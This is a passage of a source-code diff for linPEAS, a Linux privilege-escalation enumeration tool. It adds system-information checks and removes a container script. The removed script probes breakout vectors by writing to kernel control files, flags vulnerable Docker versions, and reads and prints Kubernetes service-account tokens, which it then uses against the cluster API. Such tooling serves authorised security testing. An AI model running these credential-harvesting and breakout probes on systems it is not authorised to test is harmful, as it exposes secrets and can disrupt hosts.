"s,$kernelDCW_Rhel7,${SED_RED_YELLOW}," | sed -${E} "s,$kernelB,${SED_RED},"
+warn_exec lsb_release -a 2>/dev/null
+if [ "$MACPEAS" ]; then
+    warn_exec system_profiler SPSoftwareDataType
+fi
+echo ""
--- a/linPEAS/builder/linpeas_parts/1_system_information/2_Sudo_version.sh
+++ b/linPEAS/builder/linpeas_parts/1_system_information/2_Sudo_version.sh
@@ -0,0 +1,22 @@
+# Title: System Information - Sudo Version
+# ID: SY_Sudo_version
+# Author: Carlos Polop
+# Last Update: 22-08-2023
+# Description: Get Information about the Sudo Version
+# License: GNU GPL
+# Version: 1.0 
+# Functions Used: echo_not_found, print_2title, print_info
+# Global Variables: $sudovB
+# Initial Functions:
+# Generated Global Variables:
+# Fat linpeas: 0
+# Small linpeas: 1
+
+
+print_2title "Sudo version"
+if [ "$(command -v sudo 2>/dev/null || echo -n '')" ]; then
+print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-version"
+sudo -V 2>/dev/null | grep "Sudo ver" | sed -${E} "s,$sudovB,${SED_RED},"
+else echo_not_found "sudo"
+fi
+echo ""
--- a/linPEAS/builder/linpeas_parts/1_system_information/3_USBCreator.sh
+++ b/linPEAS/builder/linpeas_parts/1_system_information/3_USBCreator.sh
@@ -0,0 +1,33 @@
+# Title: System Information - USBCreator
+# ID: SY_USBCreator
+# Author: Carlos Polop
+# Last Update: 22-08-2023
+# Description: Get Information about the USBCreator
+# License: GNU GPL
+# Version: 1.0
+# Functions Used: print_2title, print_info
+# Global Variables: $DEBUG
+# Initial Functions:
+# Generated Global Variables: $pc_version, $pc_length, $pc_major, $pc_minor
+# Fat linpeas: 0
+# Small linpeas: 0
+
+
+if (busctl list 2>/dev/null | grep -q com.ubuntu.USBCreator) || [ "$DEBUG" ]; then
+    print_2title "USBCreator"
+    print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation"
+
+    pc_version=$(dpkg -l 2>/dev/null | grep policykit-desktop-privileges | grep -oP "[0-9][0-9a-zA-Z\.]+")
+    if [ -z "$pc_version" ]; then
+        pc_version=$(apt-cache policy policykit-desktop-privileges 2>/dev/null | grep -oP "\*\*\*.*" | cut -d" " -f2)
+    fi
+    if [ -n "$pc_version" ]; then
+        pc_length=${#pc_version}
+        pc_major=$(echo "$pc_version" | cut -d. -f1)
+        pc_minor=$(echo "$pc_version" | cut -d. -f2)
+        if [ "$pc_length" -eq 4 ] && [ "$pc_major" -eq 0 ] && [ "$pc_minor"  -lt 21 ]; then
+            echo "Vulnerable!!" | sed -${E} "s,.*,${SED_RED},"
+        fi
+    fi
+fi
+echo ""
--- a/linPEAS/builder/linpeas_parts/1_system_information/4_Path.sh
+++ b/linPEAS/builder/linpeas_parts/1_system_information/4_Path.sh
@@ -0,0 +1,25 @@
+# Title: System Information - Path
+# ID: SY_Path
+# Author: Carlos Polop
+# Last Update: 22-08-2023
+# Description: Get Information about the Path
+# License: GNU GPL
+# Version: 1.0
+# Functions Used: print_2title, print_info
+# Global Variables: $DEBUG, $IAMROOT, $OLDPATH, $PATH, $Wfolders
+# Initial Functions:
+# Generated Global Variables:
+# Fat linpeas: 0
+# Small linpeas: 1
+
+
+print_2title "PATH"
+print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-path-abuses"
+if ! [ "$IAMROOT" ]; then
+    echo "$OLDPATH" 2>/dev/null | sed -${E} "s,$Wfolders|\./|\.:|:\.,${SED_RED_YELLOW},g"
+fi
+
+if [ "$DEBUG" ]; then
+     echo "New path exported: $PATH"
+fi
+echo ""
--- a/linPEAS/builder/linpeas_parts/1_system_information/5_Date.sh
+++ b/linPEAS/builder/linpeas_parts/1_system_information/5_Date.sh
@@ -0,0 +1,19 @@
+# Title: System Information - Date
+# ID: SY_Date
+# Author: Carlos Polop
+# Last Update: 22-08-2023
+# Description: Get Information about the Date
+# License: GNU GPL
+# Version: 1.0
+# Functions Used: print_2title, warn_exec
+# Global Variables:
+# Initial Functions:
+# Generated Global Variables:
+# Fat linpeas: 0
+# Small linpeas: 0
+
+
+print_2title "Date & uptime"
+warn_exec date 2>/dev/null
+warn_exec uptime 2>/dev/null
+echo ""
--- a/linPEAS/builder/linpeas_parts/1_system_information/6_CPU_info.sh
+++ b/linPEAS/builder/linpeas_parts/1_system_information/6_CPU_info.sh
@@ -0,0 +1,20 @@
+# Title: System Information - CPU info
+# ID: SY_CPU_info
+# Author: Carlos Polop
+# Last Update: 22-08-2023
+# Description: Get Information about the CPU
+# License: GNU GPL
+# Version: 1.0
+# Functions Used: print_2title, warn_exec
+# Global Variables: $DEBUG, $EXTRA_CHECKS
+# Initial Functions:
+# Generated Global Variables:
+# Fat linpeas: 0
+# Small linpeas: 0
+
+
+if [ "$EXTRA_CHECKS" ] || [ "$DEBUG" ]; then
+    print_2title "CPU info"
+    warn_exec lscpu 2>/dev/null
+    echo ""
+fi
--- a/linPEAS/builder/linpeas_parts/1_system_information/7_Mounts.sh
+++ b/linPEAS/builder/linpeas_parts/1_system_information/7_Mounts.sh
@@ -0,0 +1,21 @@
+# Title: System Information - Mounts
+# ID: SY_Mounts
+# Author: Carlos Polop
+# Last Update: 22-08-2023
+# Description: Get Information about the mounts
+# License: GNU GPL
+# Version: 1.0
+# Functions Used: print_2title, print_info
+# Global Variables: $DEBUG, $mountG, $mountpermsB, $mountpermsG, $notmounted, $Wfolders, $mounted
+# Initial Functions:
+# Generated Global Variables:
+# Fat linpeas: 0
+# Small linpeas: 1
+
+
+if [ -f "/etc/fstab" ] || [ "$DEBUG" ]; then
+    print_2title "Unmounted file-system?"
+    print_info "Check if you can mount umounted devices"
+    grep -v "^#" /etc/fstab 2>/dev/null | grep -Ev "\W+\#|^#" | sed -${E} "s,$mountG,${SED_GREEN},g" | sed -${E} "s,$notmounted,${SED_RED},g" | sed -${E} "s%$mounted%${SED_BLUE}%g" | sed -${E} "s,$Wfolders,${SED_RED}," | sed -${E} "s,$mountpermsB,${SED_RED},g" | sed -${E} "s,$mountpermsG,${SED_GREEN},g"
+    echo ""
+fi
--- a/linPEAS/builder/linpeas_parts/1_system_information/8_Disks.sh
+++ b/linPEAS/builder/linpeas_parts/1_system_information/8_Disks.sh
@@ -0,0 +1,27 @@
+# Title: System Information - Disks
+# ID: SY_Disks
+# Author: Carlos Polop
+# Last Update: 22-08-2023
+# Description: Get Information about the disks
+# License: GNU GPL
+# Version: 1.0
+# Functions Used: print_2title, warn_exec
+# Global Variables: $DEBUG
+# Initial Functions:
+# Generated Global Variables:
+# Fat linpeas: 0
+# Small linpeas: 1
+
+
+if [ -d "/dev" ] || [ "$DEBUG" ] ; then
+    print_2title "Any sd*/disk* disk in /dev? (limit 20)"
+    ls /dev 2>/dev/null | grep -Ei "^sd|^disk" | sed "s,crypt,${SED_RED}," | head -n 20
+    echo ""
+fi
+
+
+if [ "$(command -v smbutil 2>/dev/null || echo -n '')" ] || [ "$DEBUG" ]; then
+    print_2title "Mounted SMB Shares"
+    warn_exec smbutil statshares -a
+    echo ""
+fi
--- a/linPEAS/builder/linpeas_parts/1_system_information/9_Disks_extra.sh
+++ b/linPEAS/builder/linpeas_parts/1_system_information/9_Disks_extra.sh
@@ -0,0 +1,27 @@
+# Title: System Information - Disks
+# ID: SY_Disks_extra
+# Author: Carlos Polop
+# Last Update: 22-08-2023
+# Description: Get Information about the disks
+# License: GNU GPL
+# Version: 1.0
+# Functions Used: print_2title, warn_exec
+# Global Variables: $DEBUG, $EXTRA_CHECKS
+# Initial Functions:
+# Generated Global Variables:
+# Fat linpeas: 0
+# Small linpeas: 0
+
+
+if ([ "$(command -v diskutil 2>/dev/null || echo -n '')" ] || [ "$DEBUG" ]) && [ "$EXTRA_CHECKS" ]; then
+    print_2title "Mounted disks information"
+    warn_exec diskutil list
+    echo ""
+fi
+
+if [ "$EXTRA_CHECKS" ] || [ "$DEBUG" ]; then
+    print_2title "System stats"
+    (df -h || lsblk) 2>/dev/null || echo_not_found "df and lsblk"
+    warn_exec free 2>/dev/null
+    echo ""
+fi
--- a/linPEAS/builder/linpeas_parts/2_container.sh
+++ b/linPEAS/builder/linpeas_parts/2_container.sh
@@ -1,418 +0,0 @@
-###########################################
-#---------) Container functions (---------#
-###########################################
-
-containerCheck() {
-  inContainer=""
-  containerType="$(echo_no)"
-
-  # Are we inside docker?
-  if [ -f "/.dockerenv" ] ||
-    grep "/docker/" /proc/1/cgroup -qa 2>/dev/null ||
-    grep -qai docker /proc/self/cgroup  2>/dev/null ||
-    [ "$(find / -maxdepth 3 -name '*dockerenv*' -exec ls -la {} \; 2>/dev/null)" ] ; then
-
-    inContainer="1"
-    containerType="docker\n"
-  fi
-
-  # Are we inside kubenetes?
-  if grep "/kubepod" /proc/1/cgroup -qa 2>/dev/null ||
-    grep -qai kubepods /proc/self/cgroup 2>/dev/null; then
-
-    inContainer="1"
-    if [ "$containerType" ]; then containerType="$containerType (kubernetes)\n"
-    else containerType="kubernetes\n"
-    fi
-  fi
-  
-  # Inside concourse?
-  if grep "/concourse" /proc/1/mounts -qa 2>/dev/null; then
-    inContainer="1"
-    if [ "$containerType" ]; then 
-      containerType="$containerType (concourse)\n"
-    fi
-  fi
-
-  # Are we inside LXC?
-  if env | grep "container=lxc" -qa 2>/dev/null ||
-      grep "/lxc/" /proc/1/cgroup -qa 2>/dev/null; then
-
-    inContainer="1"
-    containerType="lxc\n"
-  fi
-
-  # Are we inside podman?
-  if env | grep -qa "container=podman" 2>/dev/null ||
-      grep -qa "container=podman" /proc/1/environ 2>/dev/null; then
-
-    inContainer="1"
-    containerType="podman\n"
-  fi
-
-  # Check for other container platforms that report themselves in PID 1 env
-  if [ -z "$inContainer" ]; then
-    if grep -a 'container=' /proc/1/environ 2>/dev/null; then
-      inContainer="1"
-      containerType="$(grep -a 'container=' /proc/1/environ | cut -d= -f2)\n"
-    fi
-  fi
-}
-
-inDockerGroup() {
-  DOCKER_GROUP="No"
-  if groups 2>/dev/null | grep -q '\bdocker\b'; then
-    DOCKER_GROUP="Yes"
-  fi
-}
-
-checkDockerRootless() {
-  DOCKER_ROOTLESS="No"
-  if docker info 2>/dev/null|grep -q rootless; then
-    DOCKER_ROOTLESS="Yes ($TIP_DOCKER_ROOTLESS)"
-  fi
-}
-
-enumerateDockerSockets() {
-  dockerVersion="$(echo_not_found)"
-  if ! [ "$SEARCHED_DOCKER_SOCKETS" ]; then
-    SEARCHED_DOCKER_SOCKETS="1"
-    for int_sock in $(find / ! -path "/sys/*" -type s -name "docker.sock" -o -name "docker.socket" -o -name "dockershim.sock" -o -name "containerd.sock" -o -name "crio.sock" -o -name "frakti.sock" -o -name "rktlet.sock" 2>/dev/null); do
-      if ! [ "$IAMROOT" ] && [ -w "$int_sock" ]; then
-        if echo "$int_sock" | grep -Eq "docker"; then
-          dock_sock="$int_sock"
-          echo "You have write permissions over Docker socket $dock_sock" | sed -${E} "s,$dock_sock,${SED_RED_YELLOW},g"
-          echo "Docker enummeration:"
-          docker_enumerated=""
-
-          if [ "$(command -v curl)" ]; then
-            sockInfoResponse="$(curl -s --unix-socket $dock_sock http://localhost/info)"
-            dockerVersion=$(echo "$sockInfoResponse" | tr ',' '\n' | grep 'ServerVersion' | cut -d'"' -f 4)
-            echo $sockInfoResponse | tr ',' '\n' | grep -E "$GREP_DOCKER_SOCK_INFOS" | grep -v "$GREP_DOCKER_SOCK_INFOS_IGNORE" | tr -d '"'
-            if [ "$sockInfoResponse" ]; then docker_enumerated="1"; fi
-          fi
-
-          if [ "$(command -v docker)" ] && ! [ "$docker_enumerated" ]; then
-            sockInfoResponse="$(docker info)"
-            dockerVersion=$(echo "$sockInfoResponse" | tr ',' '\n' | grep 'Server Version' | cut -d' ' -f 4)
-            printf "$sockInfoResponse" | tr ',' '\n' | grep -E "$GREP_DOCKER_SOCK_INFOS" | grep -v "$GREP_DOCKER_SOCK_INFOS_IGNORE" | tr -d '"'
-          fi
-        
-        else
-          echo "You have write permissions over interesting socket $int_sock" | sed -${E} "s,$int_sock,${SED_RED},g"
-        fi
-
-      else
-        echo "You don't have write permissions over interesting socket $int_sock" | sed -${E} "s,$int_sock,${SED_GREEN},g"
-      fi
-    done
-  fi
-}
-
-checkDockerVersionExploits() {
-  if echo "$dockerVersion" | grep -iq "not found"; then
-    VULN_CVE_2019_13139="$(echo_not_found)"
-    VULN_CVE_2019_5736="$(echo_not_found)"
-    return
-  fi
-
-  VULN_CVE_2019_13139="$(echo_no)"
-  if [ "$(echo $dockerVersion | sed 's,\.,,g')" -lt "1895" ]; then
-    VULN_CVE_2019_13139="Yes"
-  fi
-
-  VULN_CVE_2019_5736="$(echo_no)"
-  if [ "$(echo $dockerVersion | sed 's,\.,,g')" -lt "1893" ]; then
-    VULN_CVE_2019_5736="Yes"
-  fi
-}
-
-checkContainerExploits() {
-  VULN_CVE_2019_5021="$(echo_no)"
-  if [ -f "/etc/alpine-release" ]; then
-    alpineVersion=$(cat /etc/alpine-release)
-    if [ "$(echo $alpineVersion | sed 's,\.,,g')" -ge "330" ] && [ "$(echo $alpineVersion | sed 's,\.,,g')" -le "360" ]; then
-      VULN_CVE_2019_5021="Yes"
-    fi
-  fi
-}
-
-checkCreateReleaseAgent(){
-  cat /proc/$$/cgroup 2>/dev/null | grep -Eo '[0-9]+:[^:]+' | grep -Eo '[^:]+$' | while read -r subsys
-  do
-      if unshare -UrmC --propagation=unchanged bash -c "mount -t cgroup -o $subsys cgroup /tmp/cgroup_3628d4 2>&1 >/dev/null && test -w /tmp/cgroup_3628d4/release_agent" >/dev/null 2>&1 ; then
-          release_agent_breakout2="Yes (unshare with $subsys)";
-          rm -rf /tmp/cgroup_3628d4
-          break
-      fi
-  done
-}
-
-checkProcSysBreakouts(){
-  dev_mounted="No"
-  if [ $(ls -l /dev | grep -E "^c" | wc -l) -gt 50 ]; then
-    dev_mounted="Yes";
-  fi
-
-  proc_mounted="No"
-  if [ $(ls /proc | grep -E "^[0-9]" | wc -l) -gt 50 ]; then
-    proc_mounted="Yes";
-  fi
-
-  run_unshare=$(unshare -UrmC bash -c 'echo -n Yes' 2>/dev/null)
-  if ! [ "$run_unshare" = "Yes" ]; then
-    run_unshare="No"
-  fi
-
-  if [ "$(ls -l /sys/fs/cgroup/*/release_agent 2>/dev/null)" ]; then 
-    release_agent_breakout1="Yes"
-  else 
-    release_agent_breakout1="No"
-  fi
-  
-  release_agent_breakout2="No"
-  mkdir /tmp/cgroup_3628d4
-  mount -t cgroup -o memory cgroup /tmp/cgroup_3628d4 2>/dev/null
-  if [ $? -eq 0 ]; then 
-    release_agent_breakout2="Yes"; 
-    rm -rf /tmp/cgroup_3628d4
-  else 
-    mount -t cgroup -o rdma cgroup /tmp/cgroup_3628d4 2>/dev/null
-    if [ $? -eq 0 ]; then 
-      release_agent_breakout2="Yes"; 
-      rm -rf /tmp/cgroup_3628d4
-    else 
-      checkCreateReleaseAgent
-    fi
-  fi
-  rm -rf /tmp/cgroup_3628d4 2>/dev/null
-  
-  core_pattern_breakout="$( (echo -n '' > /proc/sys/kernel/core_pattern && echo Yes) 2>/dev/null || echo No)"
-  modprobe_present="$(ls -l `cat /proc/sys/kernel/modprobe` 2>/dev/null || echo No)"
-  panic_on_oom_dos="$( (echo -n '' > /proc/sys/vm/panic_on_oom && echo Yes) 2>/dev/null || echo No)"
-  panic_sys_fs_dos="$( (echo -n '' > /proc/sys/fs/suid_dumpable && echo Yes) 2>/dev/null || echo No)"
-  binfmt_misc_breakout="$( (echo -n '' > /proc/sys/fs/binfmt_misc/register && echo Yes) 2>/dev/null || echo No)"
-  proc_configgz_readable="$([ -r '/proc/config.gz' ] 2>/dev/null && echo Yes || echo No)"
-  sysreq_trigger_dos="$( (echo -n '' > /proc/sysrq-trigger && echo Yes) 2>/dev/null || echo No)"
-  kmsg_readable="$( (dmesg > /dev/null 2>&1 && echo Yes) 2>/dev/null || echo No)"  # Kernel Exploit Dev
-  kallsyms_readable="$( (head -n 1 /proc/kallsyms > /dev/null && echo Yes )2>/dev/null || echo No)" # Kernel Exploit Dev
-  mem_readable="$( (head -n 1 /proc/self/mem > /dev/null && echo Yes) 2>/dev/null || echo No)"
-  if [ "$(head -n 1 /tmp/kcore 2>/dev/null)" ]; then kcore_readable="Yes"; else kcore_readable="No"; fi
-  kmem_readable="$( (head -n 1 /proc/kmem > /dev/null && echo Yes) 2>/dev/null || echo No)"
-  kmem_writable="$( (echo -n '' > /proc/kmem > /dev/null && echo Yes) 2>/dev/null || echo No)"
-  mem_readable="$( (head -n 1 /proc/mem > /dev/null && echo Yes) 2>/dev/null || echo No)"
-  mem_writable="$( (echo -n '' > /proc/mem > /dev/null && echo Yes) 2>/dev/null || echo No)"
-  sched_debug_readable="$( (head -n 1 /proc/sched_debug > /dev/null && echo Yes) 2>/dev/null || echo No)"
-  mountinfo_readable="$( (head -n 1 /proc/*/mountinfo > /dev/null && echo Yes) 2>/dev/null || echo No)"
-  uevent_helper_breakout="$( (echo -n '' > /sys/kernel/uevent_helper && echo Yes) 2>/dev/null || echo No)"
-  vmcoreinfo_readable="$( (head -n 1 /sys/kernel/vmcoreinfo > /dev/null && echo Yes) 2>/dev/null || echo No)"
-  security_present="$( (ls -l /sys/kernel/security > /dev/null && echo Yes) 2>/dev/null || echo No)"
-  security_writable="$( (echo -n '' > /sys/kernel/security/a && echo Yes) 2>/dev/null || echo No)"
-  efi_vars_writable="$( (echo -n '' > /sys/firmware/efi/vars && echo Yes) 2>/dev/null || echo No)"
-  efi_efivars_writable="$( (echo -n '' > /sys/firmware/efi/efivars && echo Yes) 2>/dev/null || echo No)"
-}
-
-
-##############################################
-#---------------) Containers (---------------#
-##############################################
-containerCheck
-
-print_2title "Container related tools present (if any):"
-command -v docker 
-command -v lxc 
-command -v rkt 
-command -v kubectl
-command -v podman
-command -v runc
-
-if [ "$$FAT_LINPEAS_AMICONTAINED" ]; then
-  print_2title "Am I Containered?"
-  execBin "AmIContainered" "https://github.com/genuinetools/amicontained" "$FAT_LINPEAS_AMICONTAINED"
-fi
-
-print_2title "Container details"
-print_list "Is this a container? ...........$NC $containerType"
-
-print_list "Any running containers? ........ "$NC
-# Get counts of running containers for each platform
-dockercontainers=$(docker ps --format "{{.Names}}" 2>/dev/null | wc -l)
-podmancontainers=$(podman ps --format "{{.Names}}" 2>/dev/null | wc -l)
-lxccontainers=$(lxc list -c n --format csv 2>/dev/null | wc -l)
-rktcontainers=$(rkt list 2>/dev/null | tail -n +2  | wc -l)
-if [ "$dockercontainers" -eq "0" ] && [ "$lxccontainers" -eq "0" ] && [ "$rktcontainers" -eq "0" ] && [ "$podmancontainers" -eq "0" ]; then
-    echo_no
-else
-    containerCounts=""
-    if [ "$dockercontainers" -ne "0" ]; then containerCounts="${containerCounts}docker($dockercontainers) "; fi
-    if [ "$podmancontainers" -ne "0" ]; then containerCounts="${containerCounts}podman($podmancontainers) "; fi
-    if [ "$lxccontainers" -ne "0" ]; then containerCounts="${containerCounts}lxc($lxccontainers) "; fi
-    if [ "$rktcontainers" -ne "0" ]; then containerCounts="${containerCounts}rkt($rktcontainers) "; fi
-    echo "Yes $containerCounts" | sed -${E} "s,.*,${SED_RED},"
-    
-    # List any running containers
-    if [ "$dockercontainers" -ne "0" ]; then echo "Running Docker Containers" | sed -${E} "s,.*,${SED_RED},"; docker ps | tail -n +2 2>/dev/null; echo ""; fi
-    if [ "$podmancontainers" -ne "0" ]; then echo "Running Podman Containers" | sed -${E} "s,.*,${SED_RED},"; podman ps | tail -n +2 2>/dev/null; echo ""; fi
-    if [ "$lxccontainers" -ne "0" ]; then echo "Running LXC Containers" | sed -${E} "s,.*,${SED_RED},"; lxc list 2>/dev/null; echo ""; fi
-    if [ "$rktcontainers" -ne "0" ]; then echo "Running RKT Containers" | sed -${E} "s,.*,${SED_RED},"; rkt list 2>/dev/null; echo ""; fi
-fi
-
-#If docker
-if echo "$containerType" | grep -qi "docker"; then
-    print_2title "Docker Container details"
-    inDockerGroup
-    print_list "Am I inside Docker group .......$NC $DOCKER_GROUP\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
-    print_list "Looking and enumerating Docker Sockets (if any):\n"$NC
-    enumerateDockerSockets
-    print_list "Docker version .................$NC$dockerVersion"
-    checkDockerVersionExploits
-    print_list "Vulnerable to CVE-2019-5736 ....$NC$VULN_CVE_2019_5736"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW},"
-    print_list "Vulnerable to CVE-2019-13139 ...$NC$VULN_CVE_2019_13139"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW},"
-    if [ "$inContainer" ]; then
-        checkDockerRootless
-        print_list "Rootless Docker? ............... $DOCKER_ROOTLESS\n"$NC | sed -${E} "s,No,${SED_RED}," | sed -${E} "s,Yes,${SED_GREEN},"
-        echo ""
-    fi
-    if df -h | grep docker; then
-        print_2title "Docker Overlays"
-        df -h | grep docker
-    fi
-fi
-
-#If token secrets mounted
-if [ "$(mount | sed -n '/secret/ s/^tmpfs on \(.*default.*\) type tmpfs.*$/\1\/namespace/p')" ]; then
-  print_2title "Listing mounted tokens"
-  print_info "https://book.hacktricks.xyz/cloud-security/pentesting-kubernetes/attacking-kubernetes-from-inside-a-pod"
-  ALREADY="IinItialVaaluE"
-  for i in $(mount | sed -n '/secret/ s/^tmpfs on \(.*default.*\) type tmpfs.*$/\1\/namespace/p'); do
-      TOKEN=$(cat $(echo $i | sed 's/.namespace$/\/token/'))
-      if ! [ $(echo $TOKEN | grep -E $ALREADY) ]; then
-          ALREADY="$ALREADY|$TOKEN"
-          echo "Directory: $i"
-          echo "Namespace: $(cat $i)"
-          echo ""
-          echo $TOKEN
-          echo "================================================================================"
-          echo ""
-      fi
-  done
-fi
-
-if [ "$inContainer" ]; then
-    echo ""
-    print_2title "Container & breakout enumeration"
-    print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-breakout"
-    print_list "Container ID ...................$NC $(cat /etc/hostname && echo -n '\n')"
-    if [ -f "/proc/1/cpuset" ] && echo "$containerType" | grep -qi "docker"; then
-        print_list "Container Full ID ..............$NC $(basename $(cat /proc/1/cpuset))\n"
-    fi
-    print_list "Seccomp enabled? ............... "$NC
-    ([ "$(grep Seccomp /proc/self/status | grep -v 0)" ] && echo "enabled" || echo "disabled") | sed "s,disabled,${SED_RED}," | sed "s,enabled,${SED_GREEN},"
-
-    print_list "AppArmor profile? .............. "$NC
-    (cat /proc/self/attr/current 2>/dev/null || echo "disabled") | sed "s,disabled,${SED_RED}," | sed "s,kernel,${SED_GREEN},"
-
-    print_list "User proc namespace? ........... "$NC
-    if [ "$(cat /proc/self/uid_map 2>/dev/null)" ]; then (printf "enabled"; cat /proc/self/uid_map) | sed "s,enabled,${SED_GREEN},"; else echo "disabled" | sed "s,disabled,${SED_RED},"; fi
-
-    checkContainerExploits
-    print_list "Vulnerable to CVE-2019-5021 .... $VULN_CVE_2019_5021\n"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW},"
-
-    print_3title "Breakout via mounts"
-    print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation/sensitive-mounts"
-    
-    checkProcSysBreakouts
-    print_list "/proc mounted? ................. $proc_mounted\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
-    print_list "/dev mounted? .................. $dev_mounted\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
-    print_list "Run ushare ..................... $run_unshare\n" | sed -${E} "s,Yes,${SED_RED},"
-    print_list "release_agent breakout 1........ $release_agent_breakout1\n" | sed -${E} "s,Yes,${SED_RED},"
-    print_list "release_agent breakout 2........ $release_agent_breakout2\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
-    print_list "core_pattern breakout .......... $core_pattern_breakout\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
-    print_list "binfmt_misc breakout ........... $binfmt_misc_breakout\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
-    print_list "uevent_helper breakout ......... $uevent_helper_breakout\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
-    print_list "is modprobe present ............ $modprobe_present\n" | sed -${E} "s,/.*,${SED_RED},"
-    print_list "DoS via panic_on_oom ........... $panic_on_oom_dos\n" | sed -${E} "s,Yes,${SED_RED},"
-    print_list "DoS via panic_sys_fs ........... $panic_sys_fs_dos\n" | sed -${E} "s,Yes,${SED_RED},"
-    print_list "DoS via sysreq_trigger_dos ..... $sysreq_trigger_dos\n" | sed -${E} "s,Yes,${SED_RED},"
-    print_list "/proc/config.gz readable ....... $proc_configgz_readable\n" | sed -${E} "s,Yes,${SED_RED},"
-    print_list "/proc/sched_debug readable ..... $sched_debug_readable\n" | sed -${E} "s,Yes,${SED_RED},"
-    print_list "/proc/*/mountinfo readable ..... $mountinfo_readable\n" | sed -${E} "s,Yes,${SED_RED},"
-    print_list "/sys/kernel/security present ... $security_present\n" | sed -${E} "s,Yes,${SED_RED},"
-    print_list "/sys/kernel/security writable .. $security_writable\n" | sed -${E} "s,Yes,${SED_RED},"
-    if [ "$EXTRA_CHECKS" ]; then
-      print_list "/proc/kmsg readable ............ $kmsg_readable\n" | sed -${E} "s,Yes,${SED_RED},"
-      print_list "/proc/kallsyms readable ........ $kallsyms_readable\n" | sed -${E} "s,Yes,${SED_RED},"
-      print_list "/proc/self/mem readable ........ $sched_debug_readable\n" | sed -${E} "s,Yes,${SED_RED},"
-      print_list "/proc/kcore readable ........... $kcore_readable\n" | sed -${E} "s,Yes,${SED_RED},"
-      print_list "/proc/kmem readable ............ $kmem_readable\n" | sed -${E} "s,Yes,${SED_RED},"
-      print_list "/proc/kmem writable ............ $kmem_writable\n" | sed -${E} "s,Yes,${SED_RED},"
-      print_list "/proc/mem readable ............. $mem_readable\n" | sed -${E} "s,Yes,${SED_RED},"
-      print_list "/proc/mem writable ............. $mem_writable\n" | sed -${E} "s,Yes,${SED_RED},"
-      print_list "/sys/kernel/vmcoreinfo readable  $vmcoreinfo_readable\n" | sed -${E} "s,Yes,${SED_RED},"
-      print_list "/sys/firmware/efi/vars writable  $efi_vars_writable\n" | sed -${E} "s,Yes,${SED_RED},"
-      print_list "/sys/firmware/efi/efivars writable $efi_efivars_writable\n" | sed -${E} "s,Yes,${SED_RED},"
-    fi
-    
-    echo ""
-    print_3title "Namespaces"
-    print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-breakout/namespaces"
-    ls -l /proc/self/ns/
-
-    if echo "$containerType" | grep -qi "kubernetes"; then
-        print_list "Kubernetes namespace ...........$NC $(cat /run/secrets/kubernetes.io/serviceaccount/namespace /var/run/secrets/kubernetes.io/serviceaccount/namespace /secrets/kubernetes.io/serviceaccount/namespace 2>/dev/null)\n"
-        print_list "Kubernetes token ...............$NC $(cat /run/secrets/kubernetes.io/serviceaccount/token /var/run/secrets/kubernetes.io/serviceaccount/token /secrets/kubernetes.io/serviceaccount/token 2>/dev/null)\n"
-        echo ""
-        
-        print_2title "Kubernetes Information"
-        print_info "https://book.hacktricks.xyz/cloud-security/pentesting-kubernetes/attacking-kubernetes-from-inside-a-pod"
-        
-        
-        print_3title "Kubernetes service account folder"
-        ls -lR /run/secrets/kubernetes.io/ /var/run/secrets/kubernetes.io/ /secrets/kubernetes.io/ 2>/dev/null
-        echo ""
-        
-        print_3title "Kubernetes env vars"
-        (env | set) | grep -Ei "kubernetes|kube" | grep -Ev "^WF=|^Wfolders=|^mounted=|^USEFUL_SOFTWARE='|^INT_HIDDEN_FILES=|^containerType="
-        echo ""
-
-        print_3title "Current sa user k8s permissions"
-        print_info "https://book.hacktricks.xyz/cloud-security/pentesting-kubernetes/hardening-roles-clusterroles"
-        kubectl auth can-i --list 2>/dev/null || curl -s -k -d "$(echo \"eyJraW5kIjoiU2VsZlN1YmplY3RSdWxlc1JldmlldyIsImFwaVZlcnNpb24iOiJhdXRob3JpemF0aW9uLms4cy5pby92MSIsIm1ldGFkYXRhIjp7ImNyZWF0aW9uVGltZXN0YW1wIjpudWxsfSwic3BlYyI6eyJuYW1lc3BhY2UiOiJlZXZlZSJ9LCJzdGF0dXMiOnsicmVzb3VyY2VSdWxlcyI6bnVsbCwibm9uUmVzb3VyY2VSdWxlcyI6bnVsbCwiaW5jb21wbGV0ZSI6ZmFsc2V9fQo=\"|base64 -d)" \
-          "https://${KUBERNETES_SERVICE_HOST}:${KUBERNETES_SERVICE_PORT_HTTPS}/apis/authorization.k8s.io/v1/selfsubjectrulesreviews" \
-            -X 'POST' -H 'Content-Type: application/json' \
-            --header "Authorization: Bearer $(cat /var/run/secrets/kubernetes.io/serviceaccount/token)" | sed "s,secrets|exec|create|patch|impersonate|\"*\",${SED_RED},"
-
-    fi
-    echo ""
-
-    print_2title "Container Capabilities"
-    print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation#capabilities-abuse-escape"
-    if [ "$(command -v capsh)" ]; then 
-      capsh --print 2>/dev/null | sed -${E} "s,$containercapsB,${SED_RED},g"
-    else
-      defautl_docker_caps="00000000a80425fb=cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap"
-      cat /proc/self/status | tr '\t' ' ' | grep Cap | sed -${E} "s, .*,${SED_RED},g" | sed -${E} "s/00000000a80425fb/$defautl_docker_caps/g" | sed -${E} "s,0000000000000000|00000000a80425fb,${SED_GREEN},g"
-      echo $ITALIC"Run capsh --decode=<hex> to decode the capabilities"$NC
-    fi
-    echo ""
-
-    print_2title "Privilege Mode"
